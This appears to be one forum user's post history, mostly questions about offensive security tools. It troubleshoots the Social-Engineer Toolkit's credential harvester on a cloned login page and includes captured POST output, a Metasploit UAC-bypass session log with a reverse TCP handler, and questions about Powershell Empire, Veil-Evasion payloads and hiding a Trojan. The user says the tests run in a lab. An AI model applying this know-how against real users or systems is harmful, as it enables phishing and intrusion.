
isaac_204


  1. Okay so I reset the settings to default and I stopped apache2 and everything is working fine. However the reason I wanted to change the port from 80 to a different one is because I can't port forward port 80 as it's blocked by my ISP. Also I don't mind how the URL looks since I'm just experimenting with SET. So my question is how can I change the port the Credentials Harvester runs on to another one? I've already tried to change the port in the set.config file "WEB_PORT=443" and when I access the cloned site by typing in the URL bar "192.168.1.16:443" it loads normally but when I type anything on the email or password field and press enter instead of getting the credentials I get this error in the terminal:

        The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
        [*] The Social-Engineer Toolkit Credential Harvester Attack
        [*] Credential Harvester is running on port 443
        [*] Information will be displayed to you as it arrives below:
        192.168.1.4 - - [17/Nov/2017 09:08:09] "GET / HTTP/1.1" 200 -
        [*] WE GOT A HIT! Printing the output:
        POSSIBLE USERNAME FIELD FOUND: __user=0
        PARAM: __a=1
        PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey
        PARAM: __req=1
        PARAM: __be=-1
        PARAM: __pc=PHASED:DEFAULT
        PARAM: __rev=3463961
        PARAM: lsd=AVqk3QFo
        [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
        [*] WE GOT A HIT! Printing the output:
        PARAM: __a=1
        PARAM: __be=-1
        PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey
        PARAM: __pc=PHASED:DEFAULT
        PARAM: __req=2
        PARAM: __rev=3463961
        POSSIBLE USERNAME FIELD FOUND: __user=0
        PARAM: lsd=AVqk3QFo
        PARAM: ph=C3
        POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"9ji6lu","posts":[["gk2_exposure",{"identifier":"AT4VyfQf3AxNUabC3SATM7_xd3xkC31NlKa_FXDE7lw97X0965wlsUibcquLjraBX7mXtYDQGZnGD-wbNL5JRq1O","hash":"AT69GYK4kJlcg4KX"},1510902488583,0],["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","impression_id":"104d7e83","cause":"load","referrer":""},1510902488591,0],["scuba_sample",{"int":{"clientWidth":1583,"clientHeight":940},"normal":{"view":"normal"},"_ds":"www_tinyview_port","_options":{"addBrowserFields":true}},1510902488649,0],["time_spent_bit_array",{"tos_id":"9ji6lu","start_time":1510902488,"tos_array":[505,0],"tos_len":9,"tos_seq":0,"tos_cum":7},1510902496587,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1510902496590,0]],"trigger":"ods:ms.time_spent.qa.www","send_method":"ajax"}]
        PARAM: ts=1510902496594
        [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
  2. Hello fellows! Once again I need your help! I have a problem with the ports I'm using on the Social Engineering Toolkit. By default the Credentials Harvester runs on port 80 but I wanted to change the port to another one like 443 or 4444 etc. However when I change the port from the set.config file the Credentials Harvester doesn't work so I changed the port that apache2 was listening on to the same port the Creds Harvester was listening on and when I try to run it I get this message:

        The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
        [*] The Social-Engineer Toolkit Credential Harvester Attack
        [*] Credential Harvester is running on port 4444
        [*] Information will be displayed to you as it arrives below:
        [*] Looks like the web_server can't bind to 80. Are you running Apache?
        Do you want to attempt to disable Apache? [y/n]:

     Also I enabled APACHE_SERVER in the set.config file. Can anybody enlighten me with their knowledge?! Thanks in advance!
  3. It's all good now, everything works flawlessly, thank you for your time!
  4. Much appreciated I'll try it and hopefully everything is okay! Many thanks!
  5. Thanks for the replies! /etc/apt/sources.list:

        #
        # deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free
        #deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free
  6. I have upgraded my Kali Rolling 2016.2 to Kali Rolling 2017.1 without a problem, however the apt install command doesn't seem to work! I tried installing different tools that I know for sure are included in metapackages, like OpenVAS. I tried "apt-get install openvas" and "apt install openvas" but I always get the same message "Unable to find package ..." Does anyone have any ideas? Thanks in advance!
  7. I got it working with Microsoft's tool. Seems like Rufus was damaging the ISO Image while mounting it on my USB. Many many thanks!
  8. I recently bought an Asus laptop with FreeDOS and I'm trying to install Windows 10 from a USB. I burnt the ISO image to my USB using Rufus, then I entered the BIOS on my Asus laptop, I enabled Legacy, disabled Secured Boot and put the USB first in the boot order. However when I save and exit it boots into the free boot again, whatever I do it always boots into FreeDOS. I seriously need help. Any advice is very much appreciated!
  9. Yeah I have already port forwarded my router, however when using metasploit you create the payload and you put your WAN IP and then your local IP on the handler. The problem is that in Powershell Empire the stager and the listener share the same IP so either they both use the local IP or the WAN IP. That's what is confusing to me. Thank you for your time!
  10. How can someone use Powershell Empire for attacks over the internet? Do you need a server? Also can someone create a Veil-Evasion payload and then get a connection in Empire? It would be great if someone could use it outside of the network because Privilege Escalation is way easier than it is with Metasploit! Furthermore are there any tools for Post-Exploitation other than Metasploit, Powersploit? Any suggestions would be appreciated!
  11. It closes Meterpreter session 1 closed. Reason: Died and then Exploit failed: Timeout error. Check the last two lines of the post I wrote! Thanks in advance!
  12. Hello guys I ran into a problem trying to bypass the UAC on my Windows 7 machine. I used the bypassuac_vbs exploit but this is what happened. Thanks in advance!

        msf exploit(handler) > use exploit/windows/local/bypassuac_vbs
        msf exploit(bypassuac_vbs) > show options

        Module options (exploit/windows/local/bypassuac_vbs):

           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           SESSION                   yes       The session to run this module on.

        Exploit target:

           Id  Name
           --  ----
           0   Automatic

        msf exploit(bypassuac_vbs) > set SESSION 1
        SESSION => 1
        msf exploit(bypassuac_vbs) > exploit -j
        [*] Exploit running as background job.
        [*] Started reverse TCP handler on 192.168.1.14:4444
        msf exploit(bypassuac_vbs) > [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
        [*] UAC is Enabled, checking level...
        [*] 192.168.1.5 - Meterpreter session 1 closed. Reason: Died
        [-] Exploit failed: Rex::TimeoutError Operation timed out.
  13. Thanks a lot that is a great selection of books just what I was looking for!
  14. Of course not I have built a virtual machine and I test everything there. I just want to learn more and more about pen testing. And most of the books I've read have only the basics. Also I'm open for book suggestions. Thanks in advance!
  15. Hello guys what are your methods of hiding a Trojan? And what is a Drive-By Install and how can I do it or where can I go to learn more about it?